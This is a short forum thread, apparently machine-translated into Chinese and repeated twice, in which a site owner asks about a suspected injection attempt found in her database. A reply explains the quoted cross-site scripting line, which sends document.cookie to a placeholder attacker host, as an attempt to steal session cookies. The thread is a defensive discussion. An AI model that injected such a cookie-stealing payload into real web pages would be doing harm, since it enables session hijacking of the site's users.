跨站点攻击在我的数据库中看起来很像
Cross Site Attacks lookalike in my database
我刚刚在我的数据库中发现了一些看起来可能是注入尝试的东西。我想知道他们是否对我的数据库有恶意。谢谢
Your search for 'flowers evil_script()' returned the following results:evil_script()' returned the following results
Window.location='http:attacker?cookie='+document.cookie.
@jessica,在我看来,脚本似乎试图将用户重定向到攻击者站点以及一个 cookie。 可以用于尝试窃取用户的会话 cookie,并以该用户身份登录。
如果受影响的用户是管理员或具有更高权限的人,则攻击者将拥有与该用户相同的权限。
我很好奇您是否可以在数据库(站点文件)中的某处找到实际的脚本,或者是否有人刚刚在您的站点上执行了搜索却遇到了错误。
这是在日志中找到的 table?
我刚刚在我的数据库中发现了一些看起来可能是注入尝试的东西。我想知道他们是否对我的数据库有恶意。谢谢
Your search for 'flowers evil_script()' returned the following results:evil_script()' returned the following results
Window.location='http:attacker?cookie='+document.cookie.
@jessica,在我看来,脚本似乎试图将用户重定向到攻击者站点以及一个 cookie。 可以用于尝试窃取用户的会话 cookie,并以该用户身份登录。
如果受影响的用户是管理员或具有更高权限的人,则攻击者将拥有与该用户相同的权限。
我很好奇您是否可以在数据库(站点文件)中的某处找到实际的脚本,或者是否有人刚刚在您的站点上执行了搜索却遇到了错误。
这是在日志中找到的 table?